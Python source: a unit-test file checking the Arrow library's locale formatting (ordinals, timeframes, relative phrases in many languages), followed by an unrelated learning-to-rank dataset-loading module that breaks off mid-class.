self.expect(mock_locales.get).args("name").returns(mock_locale_cls)
self.expect(mock_locale_cls).returns(mock_locale)
result = locales.get_locale("name")
self.assertEqual(result, mock_locale)
def test_locales(self):
self.assertTrue(len(locales._locales) > 0)
class LocaleTests(Chai):
def setUp(self):
super(LocaleTests, self).setUp()
self.locale = locales.EnglishLocale()
def test_format_timeframe(self):
self.assertEqual(self.locale._format_timeframe("hours", 2), "2 hours")
self.assertEqual(self.locale._format_timeframe("hour", 0), "an hour")
def test_format_relative_now(self):
result = self.locale._format_relative("just now", "now", 0)
self.assertEqual(result, "just now")
def test_format_relative_past(self):
result = self.locale._format_relative("an hour", "hour", 1)
self.assertEqual(result, "in an hour")
def test_format_relative_future(self):
result = self.locale._format_relative("an hour", "hour", -1)
self.assertEqual(result, "an hour ago")
def test_ordinal_number(self):
self.assertEqual(self.locale.ordinal_number(0), "0th")
self.assertEqual(self.locale.ordinal_number(1), "1st")
self.assertEqual(self.locale.ordinal_number(2), "2nd")
self.assertEqual(self.locale.ordinal_number(3), "3rd")
self.assertEqual(self.locale.ordinal_number(4), "4th")
self.assertEqual(self.locale.ordinal_number(10), "10th")
self.assertEqual(self.locale.ordinal_number(11), "11th")
self.assertEqual(self.locale.ordinal_number(12), "12th")
self.assertEqual(self.locale.ordinal_number(13), "13th")
self.assertEqual(self.locale.ordinal_number(14), "14th")
self.assertEqual(self.locale.ordinal_number(21), "21st")
self.assertEqual(self.locale.ordinal_number(22), "22nd")
self.assertEqual(self.locale.ordinal_number(23), "23rd")
self.assertEqual(self.locale.ordinal_number(24), "24th")
self.assertEqual(self.locale.ordinal_number(100), "100th")
self.assertEqual(self.locale.ordinal_number(101), "101st")
self.assertEqual(self.locale.ordinal_number(102), "102nd")
self.assertEqual(self.locale.ordinal_number(103), "103rd")
self.assertEqual(self.locale.ordinal_number(104), "104th")
self.assertEqual(self.locale.ordinal_number(110), "110th")
self.assertEqual(self.locale.ordinal_number(111), "111th")
self.assertEqual(self.locale.ordinal_number(112), "112th")
self.assertEqual(self.locale.ordinal_number(113), "113th")
self.assertEqual(self.locale.ordinal_number(114), "114th")
self.assertEqual(self.locale.ordinal_number(121), "121st")
self.assertEqual(self.locale.ordinal_number(122), "122nd")
self.assertEqual(self.locale.ordinal_number(123), "123rd")
self.assertEqual(self.locale.ordinal_number(124), "124th")
def test_meridian_invalid_token(self):
self.assertEqual(self.locale.meridian(7, None), None)
self.assertEqual(self.locale.meridian(7, "B"), None)
self.assertEqual(self.locale.meridian(7, "NONSENSE"), None)
class EnglishLocaleTests(Chai):
def setUp(self):
super(EnglishLocaleTests, self).setUp()
self.locale = locales.EnglishLocale()
def test_describe(self):
self.assertEqual(self.locale.describe("now", only_distance=True), "instantly")
self.assertEqual(self.locale.describe("now", only_distance=False), "just now")
class ItalianLocalesTests(Chai):
def test_ordinal_number(self):
locale = locales.ItalianLocale()
self.assertEqual(locale.ordinal_number(1), "1º")
class SpanishLocalesTests(Chai):
def test_ordinal_number(self):
locale = locales.SpanishLocale()
self.assertEqual(locale.ordinal_number(1), "1º")
class FrenchLocalesTests(Chai):
def test_ordinal_number(self):
locale = locales.FrenchLocale()
self.assertEqual(locale.ordinal_number(1), "1er")
self.assertEqual(locale.ordinal_number(2), "2e")
class RussianLocalesTests(Chai):
def test_plurals2(self):
locale = locales.RussianLocale()
self.assertEqual(locale._format_timeframe("hours", 0), "0 часов")
self.assertEqual(locale._format_timeframe("hours", 1), "1 час")
self.assertEqual(locale._format_timeframe("hours", 2), "2 часа")
self.assertEqual(locale._format_timeframe("hours", 4), "4 часа")
self.assertEqual(locale._format_timeframe("hours", 5), "5 часов")
self.assertEqual(locale._format_timeframe("hours", 21), "21 час")
self.assertEqual(locale._format_timeframe("hours", 22), "22 часа")
self.assertEqual(locale._format_timeframe("hours", 25), "25 часов")
# feminine grammatical gender should be tested separately
self.assertEqual(locale._format_timeframe("minutes", 0), "0 минут")
self.assertEqual(locale._format_timeframe("minutes", 1), "1 минуту")
self.assertEqual(locale._format_timeframe("minutes", 2), "2 минуты")
self.assertEqual(locale._format_timeframe("minutes", 4), "4 минуты")
self.assertEqual(locale._format_timeframe("minutes", 5), "5 минут")
self.assertEqual(locale._format_timeframe("minutes", 21), "21 минуту")
self.assertEqual(locale._format_timeframe("minutes", 22), "22 минуты")
self.assertEqual(locale._format_timeframe("minutes", 25), "25 минут")
class PolishLocalesTests(Chai):
def test_plurals(self):
locale = locales.PolishLocale()
self.assertEqual(locale._format_timeframe("hours", 0), "0 godzin")
self.assertEqual(locale._format_timeframe("hours", 1), "1 godzin")
self.assertEqual(locale._format_timeframe("hours", 2), "2 godziny")
self.assertEqual(locale._format_timeframe("hours", 4), "4 godziny")
self.assertEqual(locale._format_timeframe("hours", 5), "5 godzin")
self.assertEqual(locale._format_timeframe("hours", 21), "21 godzin")
self.assertEqual(locale._format_timeframe("hours", 22), "22 godziny")
self.assertEqual(locale._format_timeframe("hours", 25), "25 godzin")
class IcelandicLocalesTests(Chai):
def setUp(self):
super(IcelandicLocalesTests, self).setUp()
self.locale = locales.IcelandicLocale()
def test_format_timeframe(self):
self.assertEqual(self.locale._format_timeframe("minute", -1), "einni mínútu")
self.assertEqual(self.locale._format_timeframe("minute", 1), "eina mínútu")
self.assertEqual(self.locale._format_timeframe("hours", -2), "2 tímum")
self.assertEqual(self.locale._format_timeframe("hours", 2), "2 tíma")
self.assertEqual(self.locale._format_timeframe("now", 0), "rétt í þessu")
class MalayalamLocaleTests(Chai):
def setUp(self):
super(MalayalamLocaleTests, self).setUp()
self.locale = locales.MalayalamLocale()
def test_format_timeframe(self):
self.assertEqual(self.locale._format_timeframe("hours", 2), "2 മണിക്കൂർ")
self.assertEqual(self.locale._format_timeframe("hour", 0), "ഒരു മണിക്കൂർ")
def test_format_relative_now(self):
result = self.locale._format_relative("ഇപ്പോൾ", "now", 0)
self.assertEqual(result, "ഇപ്പോൾ")
def test_format_relative_past(self):
result = self.locale._format_relative("ഒരു മണിക്കൂർ", "hour", 1)
self.assertEqual(result, "ഒരു മണിക്കൂർ ശേഷം")
def test_format_relative_future(self):
result = self.locale._format_relative("ഒരു മണിക്കൂർ", "hour", -1)
self.assertEqual(result, "ഒരു മണിക്കൂർ മുമ്പ്")
class HindiLocaleTests(Chai):
def setUp(self):
super(HindiLocaleTests, self).setUp()
self.locale = locales.HindiLocale()
def test_format_timeframe(self):
self.assertEqual(self.locale._format_timeframe("hours", 2), "2 घंटे")
self.assertEqual(self.locale._format_timeframe("hour", 0), "एक घंटा")
def test_format_relative_now(self):
result = self.locale._format_relative("अभी", "now", 0)
self.assertEqual(result, "अभी")
def test_format_relative_past(self):
result = self.locale._format_relative("एक घंटा", "hour", 1)
self.assertEqual(result, "एक घंटा बाद")
def test_format_relative_future(self):
result = self.locale._format_relative("एक घंटा", "hour", -1)
self.assertEqual(result, "एक घंटा पहले")
class CzechLocaleTests(Chai):
def setUp(self):
super(CzechLocaleTests, self).setUp()
self.locale = locales.CzechLocale()
def test_format_timeframe(self):
self.assertEqual(self.locale._format_timeframe("hours", 2), "2 hodiny")
self.assertEqual(self.locale._format_timeframe("hours", 5), "5 hodin")
self.assertEqual(self.locale._format_timeframe("hour", 0), "0 hodin")
self.assertEqual(self.locale._format_timeframe("hours", -2), "2 hodinami")
self.assertEqual(self.locale._format_timeframe("hours", -5), "5 hodinami")
self.assertEqual(self.locale._format_timeframe("now", 0), "Teď")
def test_format_relative_now(self):
result = self.locale._format_relative("Teď", "now", 0)
self.assertEqual(result, "Teď")
def test_format_relative_future(self):
result = self.locale._format_relative("hodinu", "hour", 1)
self.assertEqual(result, "Za hodinu")
def test_format_relative_past(self):
result = self.locale._format_relative("hodinou", "hour", -1)
self.assertEqual(result, "Před hodinou")
class SlovakLocaleTests(Chai):
def setUp(self):
super(SlovakLocaleTests, self).setUp()
self.locale = locales.SlovakLocale()
def test_format_timeframe(self):
self.assertEqual(self.locale._format_timeframe("hours", 2), "2 hodiny")
self.assertEqual(self.locale._format_timeframe("hours", 5), "5 hodín")
self.assertEqual(self.locale._format_timeframe("hour", 0), "0 hodín")
self.assertEqual(self.locale._format_timeframe("hours", -2), "2 hodinami")
self.assertEqual(self.locale._format_timeframe("hours", -5), "5 hodinami")
self.assertEqual(self.locale._format_timeframe("now", 0), "Teraz")
def test_format_relative_now(self):
result = self.locale._format_relative("Teraz", "now", 0)
self.assertEqual(result, "Teraz")
def test_format_relative_future(self):
result = self.locale._format_relative("hodinu", "hour", 1)
self.assertEqual(result, "O hodinu")
def test_format_relative_past(self):
result = self.locale._format_relative("hodinou", "hour", -1)
self.assertEqual(result, "Pred hodinou")
class BulgarianLocaleTests(Chai):
def test_plurals2(self):
locale = locales.BulgarianLocale()
self.assertEqual(locale._format_timeframe("hours", 0), "0 часа")
self.assertEqual(locale._format_timeframe("hours", 1), "1 час")
self.assertEqual(locale._format_timeframe("hours", 2), "2 часа")
self.assertEqual(locale._format_timeframe("hours", 4), "4 часа")
self.assertEqual(locale._format_timeframe("hours", 5), "5 часа")
self.assertEqual(locale._format_timeframe("hours", 21), "21 час")
self.assertEqual(locale._format_timeframe("hours", 22), "22 часа")
self.assertEqual(locale._format_timeframe("hours", 25), "25 часа")
# feminine grammatical gender should be tested separately
self.assertEqual(locale._format_timeframe("minutes", 0), "0 минути")
self.assertEqual(locale._format_timeframe("minutes", 1), "1 минута")
self.assertEqual(locale._format_timeframe("minutes", 2), "2 минути")
self.assertEqual(locale._format_timeframe("minutes", 4), "4 минути")
self.assertEqual(locale._format_timeframe("minutes", 5), "5 минути")
self.assertEqual(locale._format_timeframe("minutes", 21), "21 минута")
self.assertEqual(locale._format_timeframe("minutes", 22), "22 минути")
self.assertEqual(locale._format_timeframe("minutes", 25), "25 минути")
class MacedonianLocaleTests(Chai):
def test_plurals_mk(self):
locale = locales.MacedonianLocale()
# time
self.assertEqual(locale._format_relative("сега", "now", 0), "сега")
# Hours
self.assertEqual(locale._format_timeframe("hours", 0), "0 саати")
self.assertEqual(locale._format_timeframe("hours", 1), "1 саат")
self.assertEqual(locale._format_timeframe("hours", 2), "2 саати")
self.assertEqual(locale._format_timeframe("hours", 4), "4 саати")
self.assertEqual(locale._format_timeframe("hours", 5), "5 саати")
self.assertEqual(locale._format_timeframe("hours", 21), "21 саат")
self.assertEqual(locale._format_timeframe("hours", 22), "22 саати")
self.assertEqual(locale._format_timeframe("hours", 25), "25 саати")
# Minutes
self.assertEqual(locale._format_timeframe("minutes", 0), "0 минути")
self.assertEqual(locale._format_timeframe("minutes", 1), "1 минута")
self.assertEqual(locale._format_timeframe("minutes", 2), "2 минути")
self.assertEqual(locale._format_timeframe("minutes", 4), "4 минути")
self.assertEqual(locale._format_timeframe("minutes", 5), "5 минути")
self.assertEqual(locale._format_timeframe("minutes", 21), "21 минута")
self.assertEqual(locale._format_timeframe("minutes", 22), "22 минути")
self.assertEqual(locale._format_timeframe("minutes", 25), "25 минути")
class HebrewLocaleTests(Chai):
def test_couple_of_timeframe(self):
locale = locales.HebrewLocale()
self.assertEqual(locale._format_timeframe("hours", 2), "שעתיים")
self.assertEqual(locale._format_timeframe("months", 2), "חודשיים")
self.assertEqual(locale._format_timeframe("days", 2), "יומיים")
self.assertEqual(locale._format_timeframe("years", 2), "שנתיים")
self.assertEqual(locale._format_timeframe("hours", 3), "3 שעות")
self.assertEqual(locale._format_timeframe("months", 4), "4 חודשים")
self.assertEqual(locale._format_timeframe("days", 3), "3 ימים")
self.assertEqual(locale._format_timeframe("years", 5), "5 שנים")
class MarathiLocaleTests(Chai):
def setUp(self):
super(MarathiLocaleTests, self).setUp()
self.locale = locales.MarathiLocale()
def test_dateCoreFunctionality(self):
dt = arrow.Arrow(2015, 4, 11, 17, 30, 00)
self.assertEqual(self.locale.month_name(dt.month), "एप्रिल")
self.assertEqual(self.locale.month_abbreviation(dt.month), "एप्रि")
self.assertEqual(self.locale.day_name(dt.isoweekday()), "शनिवार")
self.assertEqual(self.locale.day_abbreviation(dt.isoweekday()), "शनि")
def test_format_timeframe(self):
self.assertEqual(self.locale._format_timeframe("hours", 2), "2 तास")
self.assertEqual(self.locale._format_timeframe("hour", 0), "एक तास")
def test_format_relative_now(self):
result = self.locale._format_relative("सद्य", "now", 0)
self.assertEqual(result, "सद्य")
def test_format_relative_past(self):
result = self.locale._format_relative("एक तास", "hour", 1)
self.assertEqual(result, "एक तास नंतर")
def test_format_relative_future(self):
result = self.locale._format_relative("एक तास", "hour", -1)
self.assertEqual(result, "एक तास आधी")
# Not currently implemented
def test_ordinal_number(self):
self.assertEqual(self.locale.ordinal_number(1), "1")
class FinnishLocaleTests(Chai):
def setUp(self):
super(FinnishLocaleTests, self).setUp()
self.locale = locales.FinnishLocale()
def test_format_timeframe(self):
self.assertEqual(
self.locale._format_timeframe("hours", 2), ("2 tuntia", "2 tunnin")
)
self.assertEqual(self.locale._format_timeframe("hour", 0), ("tunti", "tunnin"))
def test_format_relative_now(self):
result = self.locale._format_relative(["juuri nyt", "juuri nyt"], "now", 0)
self.assertEqual(result, "juuri nyt")
def test_format_relative_past(self):
result = self.locale._format_relative(["tunti", "tunnin"], "hour", 1)
self.assertEqual(result, "tunnin kuluttua")
def test_format_relative_future(self):
result = self.locale._format_relative(["tunti", "tunnin"], "hour", -1)
self.assertEqual(result, "tunti sitten")
def test_ordinal_number(self):
self.assertEqual(self.locale.ordinal_number(1), "1.")
class GermanLocaleTests(Chai):
def setUp(self):
super(GermanLocaleTests, self).setUp()
self.locale = locales.GermanLocale()
def test_ordinal_number(self):
self.assertEqual(self.locale.ordinal_number(1), "1.")
def test_define(self):
self.assertEqual(
self.locale.describe("minute", only_distance=True), "eine Minute"
)
self.assertEqual(
self.locale.describe("minute", only_distance=False), "in einer Minute"
)
self.assertEqual(
self.locale.describe("hour", only_distance=True), "eine Stunde"
)
self.assertEqual(
self.locale.describe("hour", only_distance=False), "in einer Stunde"
)
self.assertEqual(self.locale.describe("day", only_distance=True), "ein Tag")
self.assertEqual(
self.locale.describe("day", only_distance=False), "in einem Tag"
)
self.assertEqual(self.locale.describe("month", only_distance=True), "ein Monat")
self.assertEqual(
self.locale.describe("month", only_distance=False), "in einem Monat"
)
self.assertEqual(self.locale.describe("year", only_distance=True), "ein Jahr")
self.assertEqual(
self.locale.describe("year", only_distance=False), "in einem Jahr"
)
class HungarianLocaleTests(Chai):
def setUp(self):
super(HungarianLocaleTests, self).setUp()
self.locale = locales.HungarianLocale()
def test_format_timeframe(self):
self.assertEqual(self.locale._format_timeframe("hours", 2), "2 óra")
self.assertEqual(self.locale._format_timeframe("hour", 0), "egy órával")
self.assertEqual(self.locale._format_timeframe("hours", -2), "2 órával")
self.assertEqual(self.locale._format_timeframe("now", 0), "éppen most")
class EsperantoLocaleTests(Chai):
def setUp(self):
super(EsperantoLocaleTests, self).setUp()
self.locale = locales.EsperantoLocale()
def test_format_timeframe(self):
self.assertEqual(self.locale._format_timeframe("hours", 2), "2 horoj")
self.assertEqual(self.locale._format_timeframe("hour", 0), "un horo")
self.assertEqual(self.locale._format_timeframe("hours", -2), "2 horoj")
self.assertEqual(self.locale._format_timeframe("now", 0), "nun")
def test_ordinal_number(self):
self.assertEqual(self.locale.ordinal_number(1), "1a")
class ThaiLocaleTests(Chai):
def setUp(self):
super(ThaiLocaleTests, self).setUp()
self.locale = locales.ThaiLocale()
def test_year_full(self):
self.assertEqual(self.locale.year_full(2015), "2558")
def test_year_abbreviation(self):
self.assertEqual(self.locale.year_abbreviation(2015), "58")
def test_format_relative_now(self):
result = self.locale._format_relative("ขณะนี้", "now", 0)
self.assertEqual(result, "ขณะนี้")
def test_format_relative_past(self):
result = self.locale._format_relative("1 ชั่วโมง", "hour", 1)
self.assertEqual(result, "ในอีก 1 ชั่วโมง")
result = self.locale._format_relative("{0} ชั่วโมง", "hours", 2)
self.assertEqual(result, "ในอีก {0} ชั่วโมง")
result = self.locale._format_relative("ไม่กี่วินาที", "seconds", 42)
self.assertEqual(result, "ในอีกไม่กี่วินาที")
def test_format_relative_future(self):
result = self.locale._format_relative("1 ชั่วโมง", "hour", -1)
self.assertEqual(result, "1 ชั่วโมง ที่ผ่านมา")
class BengaliLocaleTests(Chai):
def setUp(self):
super(BengaliLocaleTests, self).setUp()
self.locale = locales.BengaliLocale()
def test_ordinal_number(self):
result0 = self.locale._ordinal_number(0)
result1 = self.locale._ordinal_number(1)
result3 = self.locale._ordinal_number(3)
result4 = self.locale._ordinal_number(4)
result5 = self.locale._ordinal_number(5)
result6 = self.locale._ordinal_number(6)
result10 = self.locale._ordinal_number(10)
result11 = self.locale._ordinal_number(11)
result42 = self.locale._ordinal_number(42)
self.assertEqual(result0, "0তম")
self.assertEqual(result1, "1ম")
self.assertEqual(result3, "3য়")
self.assertEqual(result4, "4র্থ")
self.assertEqual(result5, "5ম")
self.assertEqual(result6, "6ষ্ঠ")
self.assertEqual(result10, "10ম")
self.assertEqual(result11, "11তম")
self.assertEqual(result42, "42তম")
self.assertEqual(self.locale._ordinal_number(-1), None)
class SwissLocaleTests(Chai):
def setUp(self):
super(SwissLocaleTests, self).setUp()
self.locale = locales.SwissLocale()
def test_ordinal_number(self):
dt = arrow.Arrow(2015, 4, 11, 17, 30, 00)
self.assertEqual(self.locale._format_timeframe("minute", 1), "einer Minute")
self.assertEqual(self.locale._format_timeframe("hour", 1), "einer Stunde")
self.assertEqual(self.locale.day_abbreviation(dt.isoweekday()), "Sa")
class RomanianLocaleTests(Chai):
def setUp(self):
super(RomanianLocaleTests, self).setUp()
self.locale = locales.RomanianLocale()
def test_timeframes(self):
self.assertEqual(self.locale._format_timeframe("hours", 2), "2 ore")
self.assertEqual(self.locale._format_timeframe("months", 2), "2 luni")
self.assertEqual(self.locale._format_timeframe("days", 2), "2 zile")
self.assertEqual(self.locale._format_timeframe("years", 2), "2 ani")
self.assertEqual(self.locale._format_timeframe("hours", 3), "3 ore")
self.assertEqual(self.locale._format_timeframe("months", 4), "4 luni")
self.assertEqual(self.locale._format_timeframe("days", 3), "3 zile")
self.assertEqual(self.locale._format_timeframe("years", 5), "5 ani")
def test_relative_timeframes(self):
self.assertEqual(self.locale._format_relative("acum", "now", 0), "acum")
self.assertEqual(
self.locale._format_relative("o oră", "hour", 1), "peste o oră"
)
self.assertEqual(
self.locale._format_relative("o oră", "hour", -1), "o oră în urmă"
)
self.assertEqual(
self.locale._format_relative("un minut", "minute", 1), "peste un minut"
)
self.assertEqual(
self.locale._format_relative("un minut", "minute", -1), "un minut în urmă"
)
self.assertEqual(
self.locale._format_relative("câteva secunde", "seconds", -1),
"câteva secunde în urmă",
)
self.assertEqual(
self.locale._format_relative("câteva secunde", "seconds", 1),
"peste câteva secunde",
)
self.assertEqual(
self.locale._format_relative("o zi", "day", -1), "o zi în urmă"
)
self.assertEqual(self.locale._format_relative("o zi", "day", 1), "peste o zi")
class ArabicLocalesTest(Chai):
def setUp(self):
super(ArabicLocalesTest, self).setUp()
self.locale = locales.ArabicLocale()
def test_timeframes(self):
# single
self.assertEqual(self.locale._format_timeframe("minute", 1), "دقيقة")
self.assertEqual(self.locale._format_timeframe("hour", 1), "ساعة")
self.assertEqual(self.locale._format_timeframe("day", 1), "يوم")
self.assertEqual(self.locale._format_timeframe("month", 1), "شهر")
self.assertEqual(self.locale._format_timeframe("year", 1), "سنة")
# double
self.assertEqual(self.locale._format_timeframe("minutes", 2), "دقيقتين")
self.assertEqual(self.locale._format_timeframe("hours", 2), "ساعتين")
self.assertEqual(self.locale._format_timeframe("days", 2), "يومين")
self.assertEqual(self.locale._format_timeframe("months", 2), "شهرين")
self.assertEqual(self.locale._format_timeframe("years", 2), "سنتين")
# up to ten
self.assertEqual(self.locale._format_timeframe("minutes", 3), "3 دقائق")
self.assertEqual(self.locale._format_timeframe("hours", 4), "4 ساعات")
self.assertEqual(self.locale._format_timeframe("days", 5), "5 أيام")
self.assertEqual(self.locale._format_timeframe("months", 6), "6 أشهر")
self.assertEqual(self.locale._format_timeframe("years", 10), "10 سنوات")
# more than ten
self.assertEqual(self.locale._format_timeframe("minutes", 11), "11 دقيقة")
self.assertEqual(self.locale._format_timeframe("hours", 19), "19 ساعة")
self.assertEqual(self.locale._format_timeframe("months", 24), "24 شهر")
self.assertEqual(self.locale._format_timeframe("days", 50), "50 يوم")
self.assertEqual(self.locale._format_timeframe("years", 115), "115 سنة")
class NepaliLocaleTests(Chai):
def setUp(self):
super(NepaliLocaleTests, self).setUp()
self.locale = locales.NepaliLocale()
def test_format_timeframe(self):
self.assertEqual(self.locale._format_timeframe("hours", 3), "3 घण्टा")
self.assertEqual(self.locale._format_timeframe("hour", 0), "एक घण्टा")
def test_format_relative_now(self):
result = self.locale._format_relative("अहिले", "now", 0)
self.assertEqual(result, "अहिले")
def test_format_relative_future(self):
result = self.locale._format_relative("एक घण्टा", "hour", 1)
self.assertEqual(result, "एक घण्टा पछी")
def test_format_relative_past(self):
result = self.locale._format_relative("एक घण्टा", "hour", -1)
self.assertEqual(result, "एक घण्टा पहिले")
class IndonesianLocaleTests(Chai):
def setUp(self):
super(IndonesianLocaleTests, self).setUp()
self.locale = locales.IndonesianLocale()
def test_timeframes(self):
self.assertEqual(self.locale._format_timeframe("hours", 2), "2 jam")
self.assertEqual(self.locale._format_timeframe("months", 2), "2 bulan")
self.assertEqual(self.locale._format_timeframe("days", 2), "2 hari")
self.assertEqual(self.locale._format_timeframe("years", 2), "2 tahun")
self.assertEqual(self.locale._format_timeframe("hours", 3), "3 jam")
self.assertEqual(self.locale._format_timeframe("months", 4), "4 bulan")
self.assertEqual(self.locale._format_timeframe("days", 3), "3 hari")
self.assertEqual(self.locale._format_timeframe("years", 5), "5 tahun")
def test_format_relative_now(self):
self.assertEqual(
self.locale._format_relative("baru saja", "now", 0), "baru saja"
)
def test_format_relative_past(self):
self.assertEqual(
self.locale._format_relative("1 jam", "hour", 1), "dalam 1 jam"
)
self.assertEqual(
self.locale._format_relative("1 detik", "seconds", 1), "dalam 1 detik"
)
def test_format_relative_future(self):
self.assertEqual(
self.locale._format_relative("1 jam", "hour", -1), "1 jam yang lalu"
)
class TagalogLocaleTests(Chai):
def setUp(self):
super(TagalogLocaleTests, self).setUp()
self.locale = locales.TagalogLocale()
def test_format_timeframe(self):
self.assertEqual(self.locale._format_timeframe("minute", 1), "isang minuto")
self.assertEqual(self.locale._format_timeframe("hour", 1), "isang oras")
self.assertEqual(self.locale._format_timeframe("month", 1), "isang buwan")
self.assertEqual(self.locale._format_timeframe("year", 1), "isang taon")
self.assertEqual(self.locale._format_timeframe("seconds", 2), "segundo")
self.assertEqual(self.locale._format_timeframe("minutes", 3), "3 minuto")
self.assertEqual(self.locale._format_timeframe("hours", 4), "4 oras")
self.assertEqual(self.locale._format_timeframe("months", 5), "5 buwan")
self.assertEqual(self.locale._format_timeframe("years", 6), "6 taon")
def test_format_relative_now(self):
self.assertEqual(
self.locale._format_relative("ngayon lang", "now", 0), "ngayon lang"
)
def test_format_relative_past(self):
self.assertEqual(
self.locale._format_relative("2 oras", "hour", 2), "2 oras mula ngayon"
)
def test_format_relative_future(self):
self.assertEqual(
self.locale._format_relative("3 oras", "hour", -3), "nakaraang 3 oras"
)
def test_ordinal_number(self):
self.assertEqual(self.locale.ordinal_number(0), "ika-0")
self.assertEqual(self.locale.ordinal_number(1), "ika-1")
self.assertEqual(self.locale.ordinal_number(2), "ika-2")
self.assertEqual(self.locale.ordinal_number(3), "ika-3")
self.assertEqual(self.locale.ordinal_number(10), "ika-10")
self.assertEqual(self.locale.ordinal_number(23), "ika-23")
self.assertEqual(self.locale.ordinal_number(100), "ika-100")
self.assertEqual(self.locale.ordinal_number(103), "ika-103")
self.assertEqual(self.locale.ordinal_number(114), "ika-114")
class EstonianLocaleTests(Chai):
def setUp(self):
super(EstonianLocaleTests, self).setUp()
self.locale = locales.EstonianLocale()
def test_format_timeframe(self):
self.assertEqual(self.locale._format_timeframe("now", 0), "just nüüd")
self.assertEqual(self.locale._format_timeframe("second", 1), "ühe sekundi")
self.assertEqual(self.locale._format_timeframe("seconds", 3), "3 sekundi")
self.assertEqual(self.locale._format_timeframe("seconds", 30), "30 sekundi")
self.assertEqual(self.locale._format_timeframe("minute", 1), "ühe minuti")
self.assertEqual(self.locale._format_timeframe("minutes", 4), "4 minuti")
self.assertEqual(self.locale._format_timeframe("minutes", 40), "40 minuti")
self.assertEqual(self.locale._format_timeframe("hour", 1), "tunni aja")
self.assertEqual(self.locale._format_timeframe("hours", 5), "5 tunni")
self.assertEqual(self.locale._format_timeframe("hours", 23), "23 tunni")
self.assertEqual(self.locale._format_timeframe("day", 1), "ühe päeva")
self.assertEqual(self.locale._format_timeframe("days", 6), "6 päeva")
self.assertEqual(self.locale._format_timeframe("days", 12), "12 päeva")
self.assertEqual(self.locale._format_timeframe("month", 1), "ühe kuu")
self.assertEqual(self.locale._format_timeframe("months", 7), "7 kuu")
self.assertEqual(self.locale._format_timeframe("months", 11), "11 kuu")
self.assertEqual(self.locale._format_timeframe("year", 1), "ühe aasta")
self.assertEqual(self.locale._format_timeframe("years", 8), "8 aasta")
self.assertEqual(self.locale._format_timeframe("years", 12), "12 aasta")
self.assertEqual(self.locale._format_timeframe("now", 0), "just nüüd")
self.assertEqual(self.locale._format_timeframe("second", -1), "üks sekund")
self.assertEqual(self.locale._format_timeframe("seconds", -9), "9 sekundit")
self.assertEqual(self.locale._format_timeframe("seconds", -12), "12 sekundit")
self.assertEqual(self.locale._format_timeframe("minute", -1), "üks minut")
self.assertEqual(self.locale._format_timeframe("minutes", -2), "2 minutit")
self.assertEqual(self.locale._format_timeframe("minutes", -10), "10 minutit")
self.assertEqual(self.locale._format_timeframe("hour", -1), "tund aega")
self.assertEqual(self.locale._format_timeframe("hours", -3), "3 tundi")
self.assertEqual(self.locale._format_timeframe("hours", -11), "11 tundi")
self.assertEqual(self.locale._format_timeframe("day", -1), "üks päev")
self.assertEqual(self.locale._format_timeframe("days", -2), "2 päeva")
self.assertEqual(self.locale._format_timeframe("days", -12), "12 päeva")
self.assertEqual(self.locale._format_timeframe("month", -1), "üks kuu")
self.assertEqual(self.locale._format_timeframe("months", -3), "3 kuud")
self.assertEqual(self.locale._format_timeframe("months", -13), "13 kuud")
self.assertEqual(self.locale._format_timeframe("year", -1), "üks aasta")
self.assertEqual(self.locale._format_timeframe("years", -4), "4 aastat")
self.assertEqual(self.locale._format_timeframe("years", -14), "14 aastat")
|
nilq/baby-python
|
python
|
# -*- coding: utf-8 -*-
# Copyright (C) H.R. Oosterhuis 2021.
# Distributed under the MIT License (see the accompanying README.md and LICENSE files).
import numpy as np
import os.path
import gc
import json
FOLDDATA_WRITE_VERSION = 4
def _add_zero_to_vector(vector):
return np.concatenate([np.zeros(1, dtype=vector.dtype), vector])
def get_dataset_from_json_info(
dataset_name,
info_path,
store_pickle_after_read = True,
read_from_pickle = True,
feature_normalization = True,
purge_test_set = True):
with open(info_path) as f:
all_info = json.load(f)
assert dataset_name in all_info, 'Dataset: %s not found in info file: %s' % (dataset_name, all_info.keys())
set_info = all_info[dataset_name]
assert set_info['num_folds'] == len(set_info['fold_paths']), 'Missing fold paths for %s' % dataset_name
if feature_normalization:
num_feat = set_info['num_unique_feat']
else:
num_feat = set_info['num_nonzero_feat']
return DataSet(dataset_name,
set_info['fold_paths'],
set_info['num_relevance_labels'],
num_feat,
set_info['num_nonzero_feat'],
already_normalized=set_info['query_normalized']
)
class DataSet(object):
"""
Class designed to manage meta-data for datasets.
"""
def __init__(self,
name,
data_paths,
num_rel_labels,
num_features,
num_nonzero_feat,
store_pickle_after_read = True,
read_from_pickle = True,
feature_normalization = True,
purge_test_set = True,
already_normalized=False):
self.name = name
self.num_rel_labels = num_rel_labels
self.num_features = num_features
self.data_paths = data_paths
self.store_pickle_after_read = store_pickle_after_read
self.read_from_pickle = read_from_pickle
self.feature_normalization = feature_normalization
self.purge_test_set = purge_test_set
self._num_nonzero_feat = num_nonzero_feat
def num_folds(self):
return len(self.data_paths)
def get_data_folds(self):
return [DataFold(self, i, path) for i, path in enumerate(self.data_paths)]
class DataFoldSplit(object):
def __init__(self, datafold, name, doclist_ranges, feature_matrix, label_vector):
self.datafold = datafold
self.name = name
self.doclist_ranges = doclist_ranges
self.feature_matrix = feature_matrix
self.label_vector = label_vector
def num_queries(self):
return self.doclist_ranges.shape[0] - 1
def num_docs(self):
return self.feature_matrix.shape[0]
def query_values_from_vector(self, qid, vector):
s_i, e_i = self.query_range(qid)
return vector[s_i:e_i]
def query_range(self, query_index):
s_i = self.doclist_ranges[query_index]
e_i = self.doclist_ranges[query_index+1]
return s_i, e_i
def query_size(self, query_index):
s_i = self.doclist_ranges[query_index]
e_i = self.doclist_ranges[query_index+1]
return e_i - s_i
def query_sizes(self):
return (self.doclist_ranges[1:] - self.doclist_ranges[:-1])
def max_query_size(self):
return np.amax(self.query_sizes())
def query_labels(self, query_index):
s_i = self.doclist_ranges[query_index]
e_i = self.doclist_ranges[query_index+1]
return self.label_vector[s_i:e_i]
def query_feat(self, query_index):
s_i = self.doclist_ranges[query_index]
e_i = self.doclist_ranges[query_index+1]
return self.feature_matrix[s_i:e_i, :]
def doc_feat(self, query_index, doc_index):
s_i = self.doclist_ranges[query_index]
e_i = self.doclist_ranges[query_index+1]
assert s_i + doc_index < self.doclist_ranges[query_index+1]
return self.feature_matrix[s_i + doc_index, :]
def doc_str(self, query_index, doc_index):
doc_feat = self.doc_feat(query_index, doc_index)
feat_i = np.where(doc_feat)[0]
doc_str = ''
for f_i in feat_i:
doc_str += '%s:%f ' % (self.datafold.feature_map[f_i], doc_feat[f_i])
return doc_str
class DataFold(object):
def __init__(self, dataset, fold_num, data_path):
self.name = dataset.name
